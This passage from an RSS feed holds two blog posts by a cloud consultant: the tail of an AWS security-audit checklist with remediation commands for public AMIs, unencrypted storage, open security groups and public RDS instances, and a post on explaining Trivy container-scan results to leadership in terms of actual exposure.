&lt;p&gt;I check for any owned AMI where &lt;code&gt;Public: true&lt;/code&gt;. It's almost never intentional - usually someone was testing cross-account sharing and forgot to undo the setting.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws ec2 describe-images &lt;span class="nt"&gt;--owners&lt;/span&gt; self &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s2"&gt;"Images[?Public==&lt;/span&gt;&lt;span class="se"&gt;\`&lt;/span&gt;&lt;span class="s2"&gt;true&lt;/span&gt;&lt;span class="se"&gt;\`&lt;/span&gt;&lt;span class="s2"&gt;].[ImageId,Name]"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  9. Unencrypted EBS volumes
&lt;/h3&gt;

&lt;p&gt;Same story as S3 encryption: compliance + defense in depth. Unencrypted EBS means the data is stored unencrypted on the underlying hardware.&lt;/p&gt;

&lt;p&gt;The annoying part: you can't encrypt an existing volume in place. You snapshot, copy the snapshot with encryption, then create a new encrypted volume. It's doable, just not "one click."&lt;/p&gt;

&lt;p&gt;The better move is enabling EBS encryption by default in each region. Everything new is encrypted automatically, and you migrate old volumes over time.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws ec2 enable-ebs-encryption-by-default &lt;span class="nt"&gt;--region&lt;/span&gt; eu-central-1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  10. Stopped instances nobody remembers
&lt;/h3&gt;

&lt;p&gt;This is more cost than security, but it's a very loud signal about the account's hygiene.&lt;/p&gt;

&lt;p&gt;Stopped instances still rack up charges for attached EBS volumes. They stick around because nobody knows if it's safe to terminate them: "Maybe someone needs it." "It might have data." So it sits there forever.&lt;/p&gt;

&lt;p&gt;If an instance has been stopped for 30+ days: create an AMI, document what it's for, then terminate it. You'll cut waste and reduce the "mystery infrastructure" pile.&lt;/p&gt;

&lt;h2&gt;
  
  
  VPC, where real breaches start
&lt;/h2&gt;

&lt;p&gt;Network misconfigurations are how the bad stuff happens. Open security groups are basically open doors.&lt;/p&gt;

&lt;h3&gt;
  
  
  11. Workloads running in the default VPC
&lt;/h3&gt;

&lt;p&gt;Every region has a default VPC. It's built for quick-start demos: public subnets, an internet gateway, public IPs by default. It's not where production should live.&lt;/p&gt;

&lt;p&gt;I check whether the default VPC has any ENIs attached. If it does, something's running there - and it's usually not supposed to be.&lt;/p&gt;

&lt;p&gt;The fix isn't "delete the default VPC" immediately. The fix is: migrate workloads to a custom VPC with private subnets, NAT, proper routing - then delete the default VPC once it's empty.&lt;/p&gt;

&lt;h3&gt;
  
  
  12. Security groups open to the world
&lt;/h3&gt;

&lt;p&gt;This is the big one. I see it everywhere.&lt;/p&gt;

&lt;p&gt;Inbound rules allowing &lt;code&gt;0.0.0.0/0&lt;/code&gt; on sensitive ports:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Port&lt;/th&gt;
&lt;th&gt;Service&lt;/th&gt;
&lt;th&gt;Risk&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;22&lt;/td&gt;
&lt;td&gt;SSH&lt;/td&gt;
&lt;td&gt;Direct shell access&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3389&lt;/td&gt;
&lt;td&gt;RDP&lt;/td&gt;
&lt;td&gt;Remote desktop access&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3306&lt;/td&gt;
&lt;td&gt;MySQL&lt;/td&gt;
&lt;td&gt;Direct database access&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5432&lt;/td&gt;
&lt;td&gt;PostgreSQL&lt;/td&gt;
&lt;td&gt;Direct database access&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1433&lt;/td&gt;
&lt;td&gt;MSSQL&lt;/td&gt;
&lt;td&gt;Direct database access&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6379&lt;/td&gt;
&lt;td&gt;Redis&lt;/td&gt;
&lt;td&gt;Often unauthenticated by default&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;27017&lt;/td&gt;
&lt;td&gt;MongoDB&lt;/td&gt;
&lt;td&gt;Historically no auth&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9200&lt;/td&gt;
&lt;td&gt;Elasticsearch&lt;/td&gt;
&lt;td&gt;Full cluster access&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5601&lt;/td&gt;
&lt;td&gt;Kibana&lt;/td&gt;
&lt;td&gt;Dashboard access, often weak/no auth&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The worst one I've seen: a security group that allowed &lt;em&gt;all traffic&lt;/em&gt; (protocol &lt;code&gt;-1&lt;/code&gt;) from &lt;code&gt;0.0.0.0/0&lt;/code&gt;. Every port, every protocol, from anywhere. On a production database server.&lt;/p&gt;

&lt;p&gt;"But we have a firewall in front." Security groups &lt;em&gt;are&lt;/em&gt; your firewall. That's the point.&lt;/p&gt;

&lt;h3&gt;
  
  
  13. VPC flow logs disabled
&lt;/h3&gt;

&lt;p&gt;Flow logs give you visibility: source, destination, port, accept/reject. Without them, when something weird happens, you're basically guessing.&lt;/p&gt;

&lt;p&gt;I usually skip empty default VPCs here because it's noise. But any custom VPC that runs workloads should have flow logs turned on (CloudWatch Logs or S3).&lt;/p&gt;

&lt;h2&gt;
  
  
  RDS, the crown jewels
&lt;/h2&gt;

&lt;p&gt;Databases hold the money: customer data, financial records, PII. If your DB is exposed or poorly configured, nothing else matters.&lt;/p&gt;

&lt;h3&gt;
  
  
  14. Publicly accessible RDS instances
&lt;/h3&gt;

&lt;p&gt;RDS has a setting: "Publicly accessible." It defaults to No… and yet I keep finding it set to Yes.&lt;/p&gt;

&lt;p&gt;A publicly accessible RDS instance gets a public DNS name that resolves to a public IP. Even if the security group is tight today, one accidental change later and your database is exposed to the internet.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws rds modify-db-instance &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--db-instance-identifier&lt;/span&gt; my-database &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--no-publicly-accessible&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--apply-immediately&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;One flag. Immediate effect. No downtime.&lt;/p&gt;

&lt;h3&gt;
  
  
  15. Unencrypted RDS storage
&lt;/h3&gt;

&lt;p&gt;Same as EBS, but higher stakes because databases usually contain your most sensitive data.&lt;/p&gt;

&lt;p&gt;And the same painful limitation: you can't enable encryption on an existing running instance. You have to snapshot, copy with encryption, restore - meaning downtime and planning.&lt;/p&gt;

&lt;p&gt;That's why it gets postponed forever: "Next sprint." For the last 18 months.&lt;/p&gt;

&lt;h3&gt;
  
  
  16. No Multi-AZ deployment
&lt;/h3&gt;

&lt;p&gt;Not security - reliability. But it matters because when a single-AZ database dies at 3 AM on a Friday, the on-call person will instantly wish someone had enabled Multi-AZ.&lt;/p&gt;

&lt;p&gt;Multi-AZ gives you automatic failover: minutes of disruption instead of hours of recovery.&lt;/p&gt;

&lt;p&gt;I don't usually flag tiny dev/test instances here, but anything that looks like production should have Multi-AZ.&lt;/p&gt;

&lt;h2&gt;
  
  
  Cost, the quiet warning light
&lt;/h2&gt;

&lt;p&gt;Not security findings, but they tell you how well the team manages the account. If money is leaking through obvious holes, security is usually leaking too.&lt;/p&gt;

&lt;h3&gt;
  
  
  17. Unattached Elastic IPs
&lt;/h3&gt;

&lt;p&gt;An unused Elastic IP costs about $3.65/month. Not huge - until you find 15-20 of them scattered across regions. That's $70/month for nothing.&lt;/p&gt;

&lt;p&gt;More importantly: if nobody noticed 20 orphaned EIPs, what else has been sitting around unnoticed?&lt;/p&gt;

&lt;h2&gt;
  
  
  So… what now?
&lt;/h2&gt;

&lt;p&gt;If you read this and thought "we probably have a few of these," you do. Everyone does.&lt;/p&gt;

&lt;p&gt;It's not a knowledge problem. Most engineers already know they should enforce MFA and encrypt databases. The real issue is visibility: nobody runs these checks regularly. No dashboard. No routine. So each quarterly audit finds 40 issues, the team fixes 20, and by next quarter there are 45 again.&lt;/p&gt;

&lt;p&gt;I used to run these checks by hand before every audit. Same commands, same console clicks, same mental checklist. Eventually I just automated the whole thing.&lt;/p&gt;

&lt;p&gt;The result is a CLI tool that runs all 17 checks in ~12 seconds and outputs a prioritized report with fixes, AWS CLI commands, and Terraform snippets for each finding.&lt;/p&gt;

&lt;p&gt;It's open source: &lt;strong&gt;&lt;a href="https://github.com/gebalamariusz/cloud-audit" rel="noopener noreferrer"&gt;cloud-audit on GitHub&lt;/a&gt;&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pip &lt;span class="nb"&gt;install &lt;/span&gt;cloud-audit
cloud-audit scan
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;No config, no stored credentials, no SaaS dashboard. It uses the AWS credentials you already have and prints a report.&lt;/p&gt;

&lt;p&gt;If your setup needs more than automated checks - architecture review, remediation planning, Terraform migration - &lt;a href="https://haitmg.pl/#contact" rel="noopener noreferrer"&gt;that's what I do for a living&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>aws</category>
      <category>security</category>
      <category>devops</category>
      <category>cloud</category>
    </item>
    <item>
      <title>89 critical vulnerabilities and nothing is on fire</title>
      <dc:creator>Mariusz Gębala</dc:creator>
      <pubDate>Sat, 28 Feb 2026 22:04:17 +0000</pubDate>
      <link>https://dev.to/haitmg/89-critical-vulnerabilities-and-nothing-is-on-fire-7c7</link>
      <guid>https://dev.to/haitmg/89-critical-vulnerabilities-and-nothing-is-on-fire-7c7</guid>
      <description>&lt;p&gt;Every month Trivy runs, this time no different. Results arrived through the pipeline straight into our channel. Across 54 container images, 89 showed CRITICAL issues. Just another routine scan.&lt;/p&gt;

&lt;p&gt;A while after that, the CEO sent me a note. Not wordy - just asked if the issue in the security report needed immediate attention. Wondered whether we were facing something serious.&lt;/p&gt;

&lt;p&gt;Harder to answer than you might think. Truth is, likely no - though there's a reason behind it. That sort of reply never fits neatly into a quick message. Explaining takes space. Space rarely given.&lt;/p&gt;

&lt;p&gt;Things didn't go well at first. For the opening stretch, my move was tossing over a Trivy JSON file along with a note saying "see attached." Not one person looked. After that, I flipped entirely - long blocks of words unpacking each CVE one by one. Still nothing. One day the CTO cut in while I was presenting, told me to "say it in plain English." What we were doing already was in English.&lt;/p&gt;

&lt;p&gt;Realizing what clicks doesn't happen fast. Took time, sure, but now it makes sense.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why raw scan results don't work for leadership
&lt;/h2&gt;

&lt;p&gt;A single look at 54 container images using Trivy inside a Kubernetes setup often reveals findings similar to these:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Severity&lt;/th&gt;
&lt;th&gt;Count&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;CRITICAL&lt;/td&gt;
&lt;td&gt;89&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;HIGH&lt;/td&gt;
&lt;td&gt;612&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MEDIUM&lt;/td&gt;
&lt;td&gt;1,247&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LOW&lt;/td&gt;
&lt;td&gt;731&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;That 89 might seem alarming at first glance - yet nearly all those flaws sit inside systems tucked behind our firewall. Since they're locked down by the VPN, outsiders can't touch them directly. Without checking which parts connect to the web, the figure tells you very little. What matters is access, not just counts.&lt;/p&gt;

&lt;p&gt;What management actually wants to know:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Is there a chance any of these might work within how things are set up?&lt;/li&gt;
&lt;li&gt;Do any of the impacted items connect to the web?&lt;/li&gt;
&lt;li&gt;Could things be deteriorating, or are we only noticing because fresh CVEs appeared?&lt;/li&gt;
&lt;li&gt;What have we already patched and what's still open?&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;CVE-2024-something means nothing to them. What matters is danger.&lt;/p&gt;

&lt;h2&gt;
  
  
  How I organize these reports today
&lt;/h2&gt;

&lt;p&gt;Finding the right fit took ages. Eventually four parts made sense. Plain setup, nothing flashy.&lt;/p&gt;

&lt;h3&gt;
  
  
  What we scanned and what shifted
&lt;/h3&gt;

&lt;p&gt;Without scope, people just see big numbers and freak out. So I always open with what we actually scanned:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;"We scan all 54 infrastructure container images using Trivy every month. This covers cluster stuff - storage controllers, networking, monitoring, databases. Not business applications. This month we upgraded 5 components and did a Kubernetes engine bump."&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;This does two things. Sets up that scanning is routine, not a fire drill. And anchors those numbers to infra images specifically. 89 CRITICAL across 54 infra containers hits different than 89 CRITICAL on your customer-facing app.&lt;/p&gt;

&lt;h3&gt;
  
  
  Why the number went up after we patched
&lt;/h3&gt;

&lt;p&gt;This always gets the same reaction. We upgraded stuff. The number went up. What?&lt;/p&gt;

&lt;p&gt;Looks weird on a slide, yeah. But it's usually not a regression. During scanning gaps, 27 fresh CVE entries appeared in open databases. On its following pass, Trivy spots these newly listed issues and marks them. Not that systems declined - just that more flaws in widely used code came to light.&lt;/p&gt;

&lt;p&gt;Without a clear explanation, managers will think progress is slipping. That's how their thinking works - fewer issues mean fixes are done. Shatter that idea fast or each update turns into a defense.&lt;/p&gt;

&lt;h3&gt;
  
  
  Breakdown by actual risk
&lt;/h3&gt;

&lt;p&gt;Here's where things usually go off track. Most folks rank flaws by CVSS alone, then call it done. That 9.8 rating? Looks terrifying - till you check the fine print. Imagine needing to send a special CMS packet to some module that ignores such packets entirely. Sitting on an inside network. Shielded by a VPN layer. Suddenly, not so urgent.&lt;/p&gt;

&lt;p&gt;Every group gets clear answers on three points. First, a plain explanation of what it means. Then whether it affects how we work right now. Finally, when changes will arrive.&lt;/p&gt;

&lt;p&gt;A few CVEs showed up in the XML parser our load balancer uses. Might sound alarming at first glance. This particular device handles traffic moving between backend systems only. External data never reaches it directly. Any exploitation would demand prior access to our internal network. The fix is ready - just held back until the vendor's upcoming update drops. That rollout fits into the planned March maintenance window, same time as always: first Wednesday, 22:00 to 23:00 CET.&lt;/p&gt;

&lt;p&gt;Here's how it looks in table form:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Component Group&lt;/th&gt;
&lt;th&gt;CRITICALs&lt;/th&gt;
&lt;th&gt;Real Risk&lt;/th&gt;
&lt;th&gt;Internet-Exposed&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Storage system&lt;/td&gt;
&lt;td&gt;32&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cluster networking&lt;/td&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Kubernetes engine&lt;/td&gt;
&lt;td&gt;19&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Monitoring stack&lt;/td&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Load balancer&lt;/td&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Minimal&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Tracing + auth proxy&lt;/td&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dashboards&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Log shipping&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Minimal&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;That "No" column all the way down? That's the whole point. Everything sits behind the VPN. TLS terminates at the ingress controller but the vulnerable components aren't on that path. To exploit any of this you'd need to already be inside the network.&lt;/p&gt;

&lt;h3&gt;
  
  
  What we did, what we're doing, what we're blocked on
&lt;/h3&gt;

&lt;p&gt;Actions with dates. Just that.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Priority&lt;/th&gt;
&lt;th&gt;Action&lt;/th&gt;
&lt;th&gt;Timeline&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Keeping an eye on Go stdlib updates (impacts 25+ images)&lt;/td&gt;
&lt;td&gt;Ongoing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Storage system moves to updated version&lt;/td&gt;
&lt;td&gt;Next maintenance window&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Update load balancer for XML and SQLite fixes&lt;/td&gt;
&lt;td&gt;March&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Fix tracing setup once upstream patch arrives&lt;/td&gt;
&lt;td&gt;After upstream release&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The tracing one is stuck because the latest version breaks dashboard rendering. Maintainers know about it, there's an open issue with 40+ comments, but no fix yet. So we wait. That's not us being slow - that's the reality of running on open-source.&lt;/p&gt;

&lt;p&gt;And this is what management needs to get: most of our "inaction" is waiting for upstream. We use official container images. When Go stdlib gets a CVE, every single Go-based tool in the cloud-native ecosystem gets hit. We can't fix it before the Go team does.&lt;/p&gt;

&lt;h2&gt;
  
  
  The framing that helped the most
&lt;/h2&gt;

&lt;p&gt;Most of those 89 CRITICALs weren't 89 different fires. It was a handful of root causes - mainly the Go stdlib thing - that propagated across every Go-based image we run. Not "our infra is broken." More like "the entire cloud-native ecosystem has a known issue and we're tracking the upstream fix like everyone else."&lt;/p&gt;

&lt;p&gt;When I frame it like that in the report, the reaction shifts. Not "why is our stuff broken" but "ok, so this is an industry thing." Which is what it actually is.&lt;/p&gt;

&lt;h2&gt;
  
  
  Things that went wrong before I figured this out
&lt;/h2&gt;

&lt;p&gt;Once I sent a report that was just the raw numbers along with "5 components upgraded this month." No context on the CRITICAL count. My manager forwarded it to the VP. The VP saw 89 CRITICAL and almost delayed a product launch. Over vulnerabilities in internal monitoring tools that aren't even reachable from outside. Took a 30-minute call to undo that.&lt;/p&gt;

&lt;p&gt;Another time a manager asked me "when will we have zero vulnerabilities?" I said "never" without any explanation. That went over about as well as you'd expect. What I should have said - and what I say now - is that any infrastructure running open-source will always have known CVEs. Always. Not about reaching zero. It's about whether they're exploitable in our specific environment and whether we have a process to patch them.&lt;/p&gt;

&lt;p&gt;The worst is sending numbers without the "so what." People see 89 CRITICAL and fill in the blanks with their imagination. And their imagination usually involves hackers. Give them the numbers AND the context or don't send anything at all.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why I keep doing this monthly
&lt;/h2&gt;

&lt;p&gt;Writing these reports isn't fun. Not why I got into this field. But they've made my life easier in ways I didn't expect.&lt;/p&gt;

&lt;p&gt;When our CEO now sees "storage system upgrade" on the maintenance calendar, he already knows that means getting rid of 32 critical vulnerabilities in our storage layer. No need to justify the downtime window anymore. He just approves it. I send a message and get a thumbs up.&lt;/p&gt;

&lt;p&gt;That only works because he's been reading these reports for months and trusts the process. Without that trust, every maintenance window is a negotiation.&lt;/p&gt;

&lt;p&gt;Zero CVEs is never going to happen. Can't happen, won't happen. But a leadership team that understands what the numbers mean, trusts that you're handling things, and doesn't block your maintenance windows? That's doable. And it starts with a report that doesn't just dump numbers.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Running Kubernetes in production and need help with vulnerability management? &lt;a href="https://haitmg.pl/#contact" rel="noopener noreferrer"&gt;Let's talk&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>devops</category>
      <category>kubernetes</category>
      <category>leadership</category>
    </item>
  </channel>
</rss>
